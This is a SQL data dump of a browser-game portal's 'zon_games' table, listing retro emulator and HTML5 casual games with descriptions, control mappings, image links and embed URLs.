(454, 'Mortal Kombat 3', '<p>Ultimate Mortal Kombat 3 (UMK3) is a fighting game in the Mortal Kombat series, originally developed and released by Midway Games to arcades in 1995. It is an update of 1995\'s earlier Mortal Kombat 3 (MK3), featuring altered gameplay, additional characters and new in-game environments. Several home versions of the game were soon released after the arcade original, although none were completely identical to the arcade version. Later home versions emulated the arcade original with more accuracy, including Mortal Kombat Arcade Kollection, which included the game alongside its predecessors Mortal Kombat II and Mortal Kombat. Some versions were released under different titles: Mortal Kombat Advance for the Game Boy Advance and Ultimate Mortal Kombat for the Nintendo DS. The iPhone/iPod version features 3D graphics. The game was well received and has been considered a high point for the Mortal Kombat series. It was later updated to include more content from previous games in the series as part of the console-exclusive Mortal Kombat Trilogy.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/mortal.png', 'https://supernintendoemulator.com/game/?game=Mortal_Kombat_3_Ultimate', 'Yes', 'Nintendo', 0, 0, '', 0, 'md'),
(456, 'CHESS GAME ', '<p>gmae chees with computer opponent&nbsp;</p>', 'https://yassi.xyz/book/mini.png', 'https://playpager.com/embed/chess/index.html', 'Yes', 'Puzzle', 0, 0, '', 0, ''),
(457, 'Cybernator', '<p><strong>Description game:</strong></p><p>Cybernator - known in Japan as Assault Suits Valken - is a run and gun game released in 1992 for the Super Nintendo Entertainment System. It is the indirect prequel to Target Earth as part of the Assault Suits series by NCS Corp. The game was localized and published overseas by Konami. A remake of Cybernator was released in 2004 for the PlayStation 2. The original Japanese releases featured artwork done by Satoshi Urushihara. Cybernator was released on the Virtual Console in PAL regions on December 7, 2007, and in North America on December 17, 2007.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://craazygames.net/test/cy.png', 'https://supernintendoemulator.com/game/?game=Cybernator', 'Yes', 'Nintendo', 0, 0, '', 0, 'md'),
(458, 'Power Lode Runner', '<p><strong>Game Description:</strong></p><p>Lode Runner is a 1983 puzzle video game, first published by Brøderbund. It is one of the first games to include a level editor, a feature that allows players to create their own levels for the game. This feature bolstered the game\'s popularity, as magazines such as Computer Gaming World held contests to see who could build the best level.[1] Tozai, Inc. currently holds the intellectual property[clarification needed] and trademark rights of Lode Runner.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://craazygames.net/test/w2.png', 'https://supernintendoemulator.com/game/?game=Power_Lode_Runne', 'Yes', 'Nintendo', 0, 0, '', 0, 'md'),
(460, '100 Doors Escape Mysteries', 'Go to unlock 100 mysterious doors. Try to solve complex puzzles. You need to use your intelligence and wisdom to escape from one room after another.Use your logic to find the key to escape. Come to try it.', 'https://img.gamemonetize.com/suvye8edtgsbcytzrjmsthkynwv70419/512x384.jpg', 'https://html5.gamemonetize.com/suvye8edtgsbcytzrjmsthkynwv70419/', '0', 'Hypercasual', 0, 0, '', 0, 'md'),
(469, 'Shoot Some Fish!', 'Become a fearless worm on a mission in Shoot Some Fish! After losing his family to hungry fish, our hero fights back! Dangling from a fishing hook, armed with a harpoon, he battles through 10 intense levels. Fish grow faster and smarter, making survival a real challenge. Use strategy and reflexes to claim victory and teach the fish a lesson they won&amp;rsquo;t forget!', 'https://img.gamemonetize.com/clv3nosn3zr04fn92j8oa70q18nqpkbe/512x384.jpg', 'https://html5.gamemonetize.com/clv3nosn3zr04fn92j8oa70q18nqpkbe/', '0', 'Shooting', 0, 0, '', 0, 'md'),
(472, 'Speed Choose Color', 'Change the color of the two walls with the colored buttons so that they match the color of the ball. The game is difficult.', 'https://img.gamemonetize.com/zben54ilxfdy3zc6m91lfdv40t7qiebw/512x384.jpg', 'https://html5.gamemonetize.com/zben54ilxfdy3zc6m91lfdv40t7qiebw/', '0', 'Hypercasual', 0, 0, '', 0, 'md'),
(478, 'SAVE US Clash War', 'SAVE US Clash War is a entertaining game to test your IQ, creativity or Are you a genius of puzzle games', 'https://img.gamemonetize.com/40s097qt7xsht4crspqblqnzzst9el3u/512x384.jpg', 'https://html5.gamemonetize.com/40s097qt7xsht4crspqblqnzzst9el3u/', '0', 'Puzzles', 0, 0, '', 0, ''),
(480, 'Flappy Hungry Bird', 'Flappy Hungry Bird is a nice game tap to fly up and eat as many fruits as possible', 'https://img.gamemonetize.com/xvi9eeua1sc9a7y92cq5ven1squoyja3/512x384.jpg', 'https://html5.gamemonetize.com/xvi9eeua1sc9a7y92cq5ven1squoyja3/', '0', 'Hypercasual', 0, 0, '', 0, 'md'),
(482, 'Superman', '<p><strong>Game Information:</strong></p><p>Superman (known in Europe as Superman: The Man of Steel) is the title of a video game released by Sunsoft for the Mega Drive/Genesis in 1992. It is based on the popular DC comic book characters of the same name and is a traditional single-player side-scrolling arcade game where the player controls Superman through various levels in an effort to defeat the evil supervillain named Brainiac. Other super villains, as bosses, include The Prankster, Metallo and Mr. Mxyzptlk. This game was planned to be released on the SNES, but was cancelled sometime before it was completed.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://craazygames.net/test/super.png', 'https://megadrive-emulator.com/game/?game=Supermanu.bin', 'Yes', 'SEGA', 0, 0, '', 0, 'md'),
(483, 'Super Castlevania IV', '<p>Super Castlevania IV is a platform game developed and published by Konami and the first Castlevania game for the Super Nintendo Entertainment System. The game was originally released in 1991 and later re-released on the Virtual Console in 2006 for the Wii[3] and in 2013 for the Wii U. It features expanded play control, 16-bit graphics featuring SNES Mode 7, and a soundtrack featuring brand new pieces and remixes based on previous Castlevania music. Following the same setting as Castlevania on the NES, the game takes place in 1691 Transylvania, where the vampire hunter Simon Belmont must defeat the vampire Dracula.[3][4]</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://craazygames.net/test/castlevania.png', 'https://supernintendoemulator.com/game/?game=Super_Castlevania_IV', 'Yes', 'Nintendo', 0, 0, '', 0, 'md'),
(484, 'Ardy Lightfoot', '<p>Ardy Lightfoot &nbsp;is a platform video game released on the Super Nintendo in 1993 in Japan and 1994 in the west. It was developed by ASCII and published by Titus in North America. Ardy Lightfoot is an anthropomorphic creature resembling a fox or cat. He is accompanied by his best friend Pec, a blue penguin. Pec can be used as a weapon, or can take the role of various other helpful devices like a hot air balloon or rock destroyer. If Ardy is hit by an enemy, Pec disappears, and can be retrieved back from a chest. If Ardy is without Pec, he can still attack by bouncing on his tail. He can also protect himself temporarily by hiding behind a mirror. The story of the game is that the sacred rainbow has shattered into seven pieces and it\'s up to Ardy to obtain them all again. Whoever collects all seven pieces will receive one wish. An evil king named Visconti has already gotten one piece and is searching for the others. To this end he sends out various creatures and henchmen such as Beecroft, Catry and others. These creatures form the opponents for Ardy during the game. Ardy is assisted by friends along the way like the elder (unknown name), Nina, and a mysterious adventurer named Don Jacoby.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://craazygames.net/test/ardy.png', 'https://supernintendoemulator.com/game/?game=Ardy_Lightfoot', 'Yes', 'Multiplayer', 0, 0, '', 0, 'md'),
(487, 'CandyMahjong', '<p>Life is full of stress, and sometimes all you need is a fun and relaxing game to take your mind off things. CandyMahjong, a delightful puzzle game, combines the best elements of classic Mahjong with a sweet, candy-themed twist. Whether you\'re a casual gamer or a Mahjong enthusiast, this game offers an immersive and addictive experience that keeps you coming back for more.</p>', 'https://craazygames.net/test/candy.png', 'https://cdn.htmlgames.com/CandyMahjong/', 'Yes', 'Match-3', 0, 0, '', 0, 'md'),
(488, 'Vex X3M 2', '<p>Vex X3M 2 is a thrilling game driving experience that combines speed, stunts, and puzzle-like platforming. Players control a stickman character who must navigate through complex obstacle courses filled with deadly traps, moving platforms, and high-speed jumps.</p>', 'https://craazygames.net/test/vex.png', 'https://html5.gamedistribution.com/faf4cfc80f8049f78e1ade958e5332a4/', 'Yes', 'Racing & Driving', 0, 0, '', 0, ''),
(489, 'Om Nom Run', '<p>Swipe gestures for movement, jumping, and sliding.<br>Power-ups and boosts to increase scores.<br>Tricks to mastering difficult levels.<br>Easy-to-learn, hard-to-master gameplay.<br>Engaging for players of all ages.</p>', 'https://craazygames.net/test/vert.png', 'https://play.famobi.com/om-nom-run', 'Yes', 'Arcade', 0, 0, '', 0, ''),
(490, 'Easy Coloring Kitty', 'Easy Coloring Kitty is a super fun and relaxing coloring game made just for kids. Get ready to bring cute kittens to life with bright colors and silly designs. Pick a picture, grab your favorite shades, and start painting. There is no right or wrong way to play: just have fun, be creative, and let your imagination run wild. Whether you like rainbow cats or classic fluffy friends, this game is all about smiles and color. Perfect for young artists who love animals and fun art time. Coloring has never been this easy or this cute!', 'https://img.gamemonetize.com/dfqi46jc4150mi7ypgfnrxp3zo64depd/512x384.jpg', 'https://html5.gamemonetize.com/dfqi46jc4150mi7ypgfnrxp3zo64depd/', '0', 'Girls', 0, 0, '', 0, ''),
(491, 'Doll Game DIY Fashion Star', 'Welcome to DIY Fashion Star, a casual DIY simulator game for girls who love fashion clothes and dressing. You need to meet customers needs and offer them your tailored clothes! Use your sense of fashion and beauty to create the best and suitable garments for every client. From selecting cloth formats to cutting and sewing, you witness how a piece of cloth transforms into a beautiful suit.', 'https://img.gamemonetize.com/8qusffsk7bkgwmah1icvzb7oeae7dlhj/512x384.jpg', 'https://html5.gamemonetize.com/8qusffsk7bkgwmah1icvzb7oeae7dlhj/', '0', 'Hypercasual', 0, 0, '', 0, ''),
(492, 'Speedboa Warer Shooting', 'Have you ever wanted to drive the fastest speedboat? Feel the stunt and thrill of high-speed rowing! Enjoy a nervous racing game in the Speedboat: Water Shooting. Youll pilot a speedboat in an exciting battle against the enemy in rough seas. Shoot the enemies with your gun. Feel the rush as you race at full speed across the ocean. Aim enemies, blast enemy boats out of your way, and protect yourself!', 'https://img.gamemonetize.com/egufh15xrkv05q6m65s3wqnm42m3wpmq/512x384.jpg', 'https://html5.gamemonetize.com/egufh15xrkv05q6m65s3wqnm42m3wpmq/', '0', 'Racing', 0, 0, '', 0, ''),
(493, 'Redball Avengers', 'Evil minions want to squeeze the planet into a square shape. Whos got the heroballs to save the world ? Oh yeah, thats right! Be the avenger Hero to the rescue and defeat all the evil squares in this HeroBall adventure! Heroball has shown up to save the world. Collect stars and unlock new characters as AmericaBall, SpiderBall, and Ironball and save the world from the minions.', 'https://img.gamemonetize.com/3c126lglzfi8k0doec3jwdcrldt7jg4p/512x384.jpg', 'https://html5.gamemonetize.com/3c126lglzfi8k0doec3jwdcrldt7jg4p/', '0', 'Adventure', 0, 0, '', 0, ''),
(494, 'Brainrot Rescue', 'Brainrot Rescue is a festive puzzle game where players help Brainrot Claus retrieve his stolen gifts from mischievous snowmen. The gameplay revolves around strategically pulling pins to guide Santa safely through various obstacles, such as hot lava and icy traps, to collect presents and defeat enemies. With 30 challenging levels, players must use problem-solving skills to determine the correct sequence of pin pulls, ensuring Brainrot safe passage and the successful recovery of all gifts.', 'https://img.gamemonetize.com/cazmjngq89ugket09cniyx7qj16g90ls/512x384.jpg', 'https://html5.gamemonetize.com/cazmjngq89ugket09cniyx7qj16g90ls/', '0', 'Puzzles', 0, 0, '', 0, ''),
(495, 'FNF Girlfriend Multiverse Fashion', 'Welcome to FNF Girlfriend Multiverse Fashion. Friday Night Funkin&amp;rsquo; Girl seems bored of trying music. She has a plan for something different other than music. Yes, she wants to try multiverse fashion! Sounds fun! right? Join and pick a different fashion outfit. At each level, her wardrobe is filled with different costumes. Help them to choose the best one!', 'https://img.gamemonetize.com/fzarev6vwbk273g4l0gvhhfsoyssvzj3/512x384.jpg', 'https://html5.gamemonetize.com/fzarev6vwbk273g4l0gvhhfsoyssvzj3/', '0', 'Girls', 0, 0, '', 0, ''),
(496, 'Reveal the Animal', 'Reveal the Animal is a fun and educational math game where players must select fractions that add up to 1. As players correctly solve the fraction equations, they will gradually uncover a hidden animal. The game features a variety of animals and difficulty levels, making it suitable for players of all ages.', 'https://img.gamemonetize.com/xcb94zu8i4nnu6kv9ug3g7iox4typ2q1/512x384.jpg', 'https://html5.gamemonetize.com/xcb94zu8i4nnu6kv9ug3g7iox4typ2q1/', '0', 'Puzzles', 0, 0, '', 0, ''),
(499, 'Jelly Connect', 'Jelly Connect challenges players to pair identical, squishy jellies using a path of no more than three lines. Clear the board quickly to advance. As you progress, each level becomes tougher, requiring sharper memory and strategy. The vibrant visuals and engaging puzzles make it an addictive experience for everyone.', 'https://img.gamemonetize.com/lmp67tkqo1z2glaxsqvc5yxh1bzlbbft/512x384.jpg', 'https://html5.gamemonetize.com/lmp67tkqo1z2glaxsqvc5yxh1bzlbbft/', '0', 'Puzzles', 0, 0, '', 0, ''),
(501, 'Tung Sahur IO', '<p>Join up to <strong>100 players</strong> in this chaotic, meme-fueled multiplayer game inspired by viral internet sensations! Start as an innocent school kid, but beware — the legendary <strong>Tung Sahur infection</strong> is spreading like wildfire!</p><p>🎭 Experience TikTok\'s most viral memes, from <strong>Bombardino Crocodilo</strong> to the iconic <strong>Tung Tung Tung Sahur</strong>, brought to life in a hilarious and action-packed survival game.</p><p>🧟 Play as a school kid trying to escape infection, or become one of the <strong>Tung Sahur infected</strong> and team up to chase down your classmates. Laugh, scream, and survive the madness with your friends!</p>', 'https://img.gamemonetize.com/oddet3vf59i0den8dikuc3us81aby79z/512x384.jpg', 'https://html5.gamemonetize.com/oddet3vf59i0den8dikuc3us81aby79z/', 'Yes', 'Multiplayer', 0, 0, '', 0, '');
INSERT INTO `zon_games` (`id`, `game_name`, `game_description`, `game_image_url`, `game_url`, `game_published`, `game_category`, `game_status`, `game_played`, `game_banner_url`, `is_featured`, `game_card_size`) VALUES
(503, 'Truck Transport Simulator', '<p>Do you love truck games? Try <strong>Truck Transport Simulator</strong> – an exciting driving game designed especially for truck lovers and boys who enjoy realistic challenges.</p><p>Drive a powerful truck through diverse landscapes and complete transport missions like loading boxes and barrels, then park your truck in the designated spots.</p><p>🚧 <strong>Watch out for rough roads</strong> – keep your cargo balanced! Driving too fast can make it fall and cause you to fail the mission.</p><p>A perfect game for fans of driving simulators, truck games, and transport challenges!</p>', 'https://img.gamemonetize.com/0yowl6lwz72aululkpwscu00who4si65/512x384.jpg', 'https://html5.gamemonetize.com/0yowl6lwz72aululkpwscu00who4si65/', 'Yes', 'Arcade', 0, 0, '', 0, 'md'),
(505, 'Hide and Luig', 'A whimsical point-and-click hide-and-seek adventure where your only goal is to find the ever-elusive Luig&amp;mdash;who insists on hiding inside the weirdest objects imaginable. Explore playful scenes, click around, and uncover Luig&amp;rsquo;s latest hideout in this charmingly absurd journey of curiosity and surprise.', 'https://img.gamemonetize.com/h31mj5h9t2r0imhvrmwf3xelw5nw2vjf/512x384.jpg', 'https://html5.gamemonetize.com/h31mj5h9t2r0imhvrmwf3xelw5nw2vjf/', '0', 'Puzzles', 0, 0, '', 0, ''),
(507, 'Banana Quest', 'Get ready for a thrilling jungle adventure in Banana Quest! Play as a brave monkey on a mission to collect as many bananas as possible while dodging spikes, jumping over obstacles, and avoiding enemies. With vibrant graphics, catchy music, and smooth controls, this endless runner offers nonstop action and excitement. The more bananas you collect, the higher your score climbs! Perfect for players of all ages&amp;mdash;simple to play, hard to master!', 'https://img.gamemonetize.com/f0t5gpi68odchy744s4u3hgdfeyqgqdu/512x384.jpg', 'https://html5.gamemonetize.com/f0t5gpi68odchy744s4u3hgdfeyqgqdu/', '0', 'Hypercasual', 0, 0, '', 0, ''),
(508, 'Getting Over It Unblocked', 'Start the most wonderful climbing adventure ever at Getting Over It Unblocked. This game will test your patience, skill, and determination like never before. You play as a man stuck in a giant pot, armed with only a hammer to climb impossible platforms. Your goal is to keep going up. Three different adventures are waiting to challenge you. Note hollowed-out platforms, longer distances, etc.', 'https://img.gamemonetize.com/99gjodm9l46o7lbkuf26qhc54pxyzp1o/512x384.jpg', 'https://html5.gamemonetize.com/99gjodm9l46o7lbkuf26qhc54pxyzp1o/', '0', 'Adventure', 0, 0, '', 0, ''),
(509, 'Rotate to Escape', 'Rotate to Escape is a captivating puzzle adventure where you must navigate 60 treacherous dungeon levels to find the key and break free. But danger lurks at every turn deadly traps, falling crates, and razor-sharp thorns stand in your way. The twist? You can rotate the entire dungeon to alter gravity, turning walls into walkways and pitfalls into paths. Think fast, plan your moves, and outsmart the dungeon&amp;rsquo;s tricks to claim your freedom&amp;hellip; if you dare! Can you escape, or will the maze claim another victim?', 'https://img.gamemonetize.com/f58cns9ta0dmc04bwpq0mz0yrxy3gvcr/512x384.jpg', 'https://html5.gamemonetize.com/f58cns9ta0dmc04bwpq0mz0yrxy3gvcr/', '0', 'Puzzles', 0, 0, '', 0, ''),
(510, 'Giant Wanted Monster', 'The city is being occupied by giant monsters. You, as an elite sniper, pick up your sniper gun. Defeat these crazy monsters and protect the survival of humanity. In Giant Wanted Monster, the fate of the city is at stake with every bullet. You need to use the powerful sniper weapon to shoot accurately from a distance and hit the monsters Achilles heel.', 'https://img.gamemonetize.com/3xlseluxd857tfjdkzpfjz8ts4its0bi/512x384.jpg', 'https://html5.gamemonetize.com/3xlseluxd857tfjdkzpfjz8ts4its0bi/', '0', 'Arcade', 0, 0, '', 0, 'md'),
(511, 'Roblox Couple Dress up', 'Get ready to unleash your creativity with Roblox Couple Dress-up, a fun and exciting fashion game where you can design the perfect outfits for Roblox characters. Whether you&amp;rsquo;re dressing up for a casual day out or a glamorous event, the possibilities are endless. Choose from a variety of trendy clothes, accessories, and hairstyles to style the perfect couple look. Perfect for fashion enthusiasts and Roblox fans alike, this dress-up game brings your virtual fashion dreams to life!', 'https://img.gamemonetize.com/o3d0s6ul608rk9dm4ius3tax6s2w5src/512x384.jpg', 'https://html5.gamemonetize.com/o3d0s6ul608rk9dm4ius3tax6s2w5src/', '0', 'Girls', 0, 0, '', 0, ''),
(512, 'Hero Rescue Puzzle', 'Do you like rescue games? Of course, they are great. Help the hero rescue to save the princess and get the treasure in the new hero wars game - Hero Rescue. Shoot the sticks to save the princess, to kill the goblins, to get a treasure, ... You will become a rich hero in this township rescue game.', 'https://img.gamemonetize.com/3596x93682lmj4cn7mrtldmfhviig7jj/512x384.jpg', 'https://html5.gamemonetize.com/3596x93682lmj4cn7mrtldmfhviig7jj/', '0', 'Puzzles', 0, 0, '', 0, ''),
(514, 'Among Us Online Edition', 'Welcome to game Among Us Online Edition - game based on Among Us, but in this game you can play only solo and as imposter on the space ship. You can do sabotage on spaceship or killing them one by one and without being caught. Have a nice game!', 'https://img.gamemonetize.com/luye5rleios737wp2o9wjq7h577gl937/512x384.jpg', 'https://html5.gamemonetize.com/luye5rleios737wp2o9wjq7h577gl937/', '0', 'Arcade', 0, 0, '', 0, ''),
(516, 'Super RunCraft', 'Super RunCraft is a wonderful 3D Run Game, run through a long minecraft land to collect rows of golden coins, number of special items such as Hoveboard along your running lane and avoid the obstacles in your way. The classic style endless running game that always gives you a big fantastic mincraf fun.', 'https://img.gamemonetize.com/syoymgm7jw290t7mz0hpqjqmc8yqlmrd/512x384.jpg', 'https://html5.gamemonetize.com/syoymgm7jw290t7mz0hpqjqmc8yqlmrd/', '0', 'Arcade', 0, 0, '', 0, ''),
(518, 'Skate Hooligans', '<h3>&nbsp;</h3><p><strong>Cowabunga! The little hooligans are here and ready to roll!</strong><br>Choose your favorite hero and dive into a wild skating adventure. Collect coins, unlock powerful upgrades, and buy awesome skateboards. Dodge dangerous obstacles, perform crazy tricks, and rack up the highest score possible. Get ready for non-stop action and fun!</p>', 'https://img.gamemonetize.com/vy07es6s71vci1su3wzcqrp7e3ym0vtw/512x384.jpg', 'https://html5.gamemonetize.com/vy07es6s71vci1su3wzcqrp7e3ym0vtw/', 'Yes', 'Arcade', 0, 0, '', 0, ''),
(519, 'Squid Game Challenge 3D', 'Invite to Squid Game. Invite to a fair game of Red lights, eco-friendly lights. Whoever wins this game will win a great deal of prize money. Stop at the red light. Continue when the thumbs-up is on. Follow your personality\'s head motions! Do not rush Red Light, Green Light Sugar Honeycombs Tug-of-war Marbles Glass Stepping Stones The Squid Game Experience the delights of the craze that\'s sweeping the globe by your pc!', 'https://img.gamemonetize.com/dtemvyguxvsbdnnoilu3s1ygg8umdbvt/512x384.jpg', 'https://html5.gamemonetize.com/dtemvyguxvsbdnnoilu3s1ygg8umdbvt/', '0', 'Shooting', 0, 0, '', 0, ''),
(523, 'Fishdom', 'Dive into the fantastic world of Fishdom! Youre in for an ocean of exciting levels, scores of adorable fish and pets, and a sea of captivating events! Explore incredible underwater adventures! Unlock aquariums and save the fish on every level.', 'https://img.gamemonetize.com/55m645alo88yve3z7su5g252gfk9t0p6/512x384.jpg', 'https://html5.gamemonetize.com/55m645alo88yve3z7su5g252gfk9t0p6/', '0', 'Puzzles', 0, 0, '', 0, ''),
(524, 'Terminal Master Bus Tycoon', 'Play the bus station simulation tycoon game in the Terminal Master - Bus Tycoon. From a small bus station to a global transportation mogul. Keep upgrading stations, buying buses, and recruiting employees. Increase efficiency and revenue. Buy new buses, unlock faster and fancier vehicles. Its easy and stress-free to earn even when youre offline. Keep upgrading until you are the top bus tycoon in the world.', 'https://img.gamemonetize.com/cptb46rrt3zu7opt09qswu8ndptftjbl/512x384.jpg', 'https://html5.gamemonetize.com/cptb46rrt3zu7opt09qswu8ndptftjbl/', '0', 'Fighting', 0, 0, '', 0, ''),
(525, 'Pull the Pin Fish Rescue', 'Pull the Pin: Fish Rescue! is a relaxing and addictive puzzle game with lots of interesting puzzles. You will see several niches in it. They will be separated by partitions. In one niche you will see a fish, and in another water. You will need to carefully study everything and pull the pin. Thus, you will open it and water will get to the fish.', 'https://img.gamemonetize.com/rhtnddpq95ww5wuo0yak159m7df41kif/512x384.jpg', 'https://html5.gamemonetize.com/rhtnddpq95ww5wuo0yak159m7df41kif/', '0', 'Puzzles', 0, 0, '', 0, ''),
(526, 'Aha World Dream Town', 'Welcome to Aha World Dream Town, a casual life simulation game online. Whether you are an enthusiast of simulator games or just a casual player looking for relaxation online, do not miss this chance to experience a different world from your real life. Aha World Dream Town offers plenty of scenes, including supermarkets, restaurants, shops, and the game center. Traverse various charming settings and create new characters.', 'https://img.gamemonetize.com/0ered4nljwbbu6gnxbzg04g6etc6r6ou/512x384.jpg', 'https://html5.gamemonetize.com/0ered4nljwbbu6gnxbzg04g6etc6r6ou/', '0', 'Hypercasual', 0, 0, '', 0, ''),
(534, 'Foody Memory', '\n\"Foody Memory\" is a delightful memory card puzzle game that will test your recollection skills. Simply click on the cards to reveal food icons, and then memorize them so that you can match them with similar cards. Your goal is to successfully match all of the cards on the board to complete each level. Can you prove your memory prowess in this tasty memory game? Give it a try and find out!', 'https://img.gamedistribution.com/6a4b0bb02a0a47b1a39448cfd74bce03-512x512.jpeg', 'https://html5.gamedistribution.com/6a4b0bb02a0a47b1a39448cfd74bce03/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/6a4b0bb02a0a47b1a39448cfd74bce03-1280x550.jpeg', 0, ''),
(535, 'Cowboy Adventures', 'Near a small town in the Wild West hordes of zombies appeared. You in the Cowboy Adventures game will have to help the brave sheriff fight them and destroy them. Your cowboy will run forward in a certain location. On its way will fall into the ground dips and other obstacles. You will have to make your hero jump over all these dangerous areas at speed. As soon as you see a zombie or another monster, open hurricane fire from a weapon. Bullets falling into monsters will inflict damage on them and destroy them.', 'https://img.gamedistribution.com/5055d62f77e745469cdff9a01567aa32-512x512.jpeg', 'https://html5.gamedistribution.com/5055d62f77e745469cdff9a01567aa32/', '0', 'Adventure', 0, 0, 'https://img.gamedistribution.com/5055d62f77e745469cdff9a01567aa32-1280x550.jpeg', 0, ''),
(536, 'Mother Duck and Ducklings Jigsaw', 'Duck Mother and Ducklings Jigsaw, in this fun game we enter the world of mothers and ducks. These cute baby ducks never leave their mothers, so put together all the pieces of the puzzl. 12 different puzzles, 12 different duck families are waiting for you.', 'https://img.gamedistribution.com/d452887d4ce4477b80591b27058aeb13-512x384.jpeg', 'https://html5.gamedistribution.com/d452887d4ce4477b80591b27058aeb13/', '0', 'Puzzle', 0, 0, '', 0, ''),
(537, 'Eat Small Fishes', 'You have to escape from big fish and eat small fish. tap on the screen to move the player fish. collect points as you can. when collide a big fish then game over.\nEnjoy!', 'https://img.gamedistribution.com/1046f167c41243a4a41d2b104a380545-512x384.jpeg', 'https://html5.gamedistribution.com/1046f167c41243a4a41d2b104a380545/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/1046f167c41243a4a41d2b104a380545-1280x550.jpeg', 0, ''),
(538, 'Funny Tattoo Shop', 'Choose from the three sets of choices, and you\'ll be given the piece that you will then tattoo to your chosen model. Do the stencil, make the outline and color it according to your piece. After finishing your artwork, dress up your model that suits the tattoo you have created. Finish the game and unlock all the achievements. Share your screenshots to other players of the game. Have fun tattooing!', 'https://img.gamedistribution.com/53160aad0f0b4a5aa25f1337cfb6521c-512x384.jpeg', 'https://html5.gamedistribution.com/53160aad0f0b4a5aa25f1337cfb6521c/', '0', 'Art', 0, 0, 'https://img.gamedistribution.com/53160aad0f0b4a5aa25f1337cfb6521c-1280x550.jpeg', 0, ''),
(539, 'Ariel Zero To Popular', 'Ariel is a normal girl with acne and heavy glasses on her face and no one would notice. She has always liked Eric, but Eric is very popular in school, and Ariel is afraid to talk to him. Now Ariel\'s good friends Elsa and Anna want to help her. Can you help Ariel get a new look with Elsa and Anna? Will Ariel catch Eric\'s attention after this?', 'https://img.gamedistribution.com/cb7430da2b0e4f38a36bd0a65606911f-512x384.jpeg', 'https://html5.gamedistribution.com/cb7430da2b0e4f38a36bd0a65606911f/', '0', 'Care', 0, 0, '', 0, ''),
(540, 'Knight War Coloring', 'Knight War Coloring is a free online coloring and kids game! In this game you will find eight different pictures which have to be colored as fast as you can to obtain a great score at the end of the game. You have 23 different colors to choose. You can also save the colored image. Have fun!', 'https://img.gamedistribution.com/c14004e4033044f1945c483149e00471-512x384.jpeg', 'https://html5.gamedistribution.com/c14004e4033044f1945c483149e00471/', '0', 'Art', 0, 0, '', 0, ''),
(541, 'Summer Midi Skirt Fashion', 'Whatever kind of summer fashion you’re into, this sunny season the mini skirts rule the trends and you’d better learn how to include them into your jaw-dropping daily looks. We’ve gathered three fashion specialists here on DressUpWho.com so hurry up and join Harley Quinn, Moana, and Mulan for their ultimate styling session. Get started with the Summer Midi Skirt Fashion, an online dress up game for girls, and begin by discovering the awesome mini skirts they own: from floral-print midi skirts to stripes pencil skirts, pleated crepe skirts, asymmetric midi skirts, ruffled skirts, and even mom skirts, there is a lot of choices available at your disposal.', 'https://img.gamedistribution.com/6b5329ef861e4e9b83db920425e0602a-512x384.jpeg', 'https://html5.gamedistribution.com/6b5329ef861e4e9b83db920425e0602a/', '0', 'Dress-up', 0, 0, '', 0, ''),
(542, 'Dino Party Jigsaw', 'Dinosaurs have organized a party, the birthday party of the youngest dinosaur will take place here today, would you like to join this fun party and do some great puzzlers? 12 different pictures were taken at the party and they were put into a puzzle, everyone is confident in your abilities. Connect the pieces, make the dinosaurs happy.', 'https://img.gamedistribution.com/604eca285b694e518c50fa82cfdd54c6-512x384.jpeg', 'https://html5.gamedistribution.com/604eca285b694e518c50fa82cfdd54c6/', '0', 'Puzzle', 0, 0, '', 0, ''),
(543, 'Easy Kids Coloring Tractor', 'Easy Kids Coloring Tractor is an online game that you can play for free. Children\'s world is always full of imagination. Easy Kids Coloring Tractor is a great coloring game suitable for all ages. There are various tractor patterns drawn in the game, but these patterns have no colors. You need to fill these patterns with various colors. If you have a certain art talent, come and use magic to fill in various patterns with colors, and finally take pictures of these art works and show others your art ability. Have fun and come back for more free games.\n', 'https://img.gamedistribution.com/13198aa928094049a4ae18decf2f17bc-512x384.jpeg', 'https://html5.gamedistribution.com/13198aa928094049a4ae18decf2f17bc/', '0', 'Art', 0, 0, '', 0, ''),
(544, 'Fish Live Makeover', 'Fish Live is the game for all fish lovers! Raised a fish lately? Play Fish Live and raise, feed and breed your own lovable fishes! \n \nBy playing this game you may find yourself hopelessly addicted to feeding and caring for adorable fishes, decorating your tanks with exotic tropical plants, and inviting others to view them in your own glorious tank. \n', 'https://img.gamedistribution.com/66b12fc18dd84377b0fd4775aff78052-512x384.jpeg', 'https://html5.gamedistribution.com/66b12fc18dd84377b0fd4775aff78052/', '0', 'Care', 0, 0, '', 0, ''),
(545, 'Line Driver', 'Line Driver is game where you need to control the car in to narrow line road. The road is with corners and you need to be careful. Collect some coins to earn extra points. Try not to crash and drive longer as you can. ', 'https://img.gamedistribution.com/6f446b4e8b1040a687fb122f512da0c1-512x384.jpeg', 'https://html5.gamedistribution.com/6f446b4e8b1040a687fb122f512da0c1/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
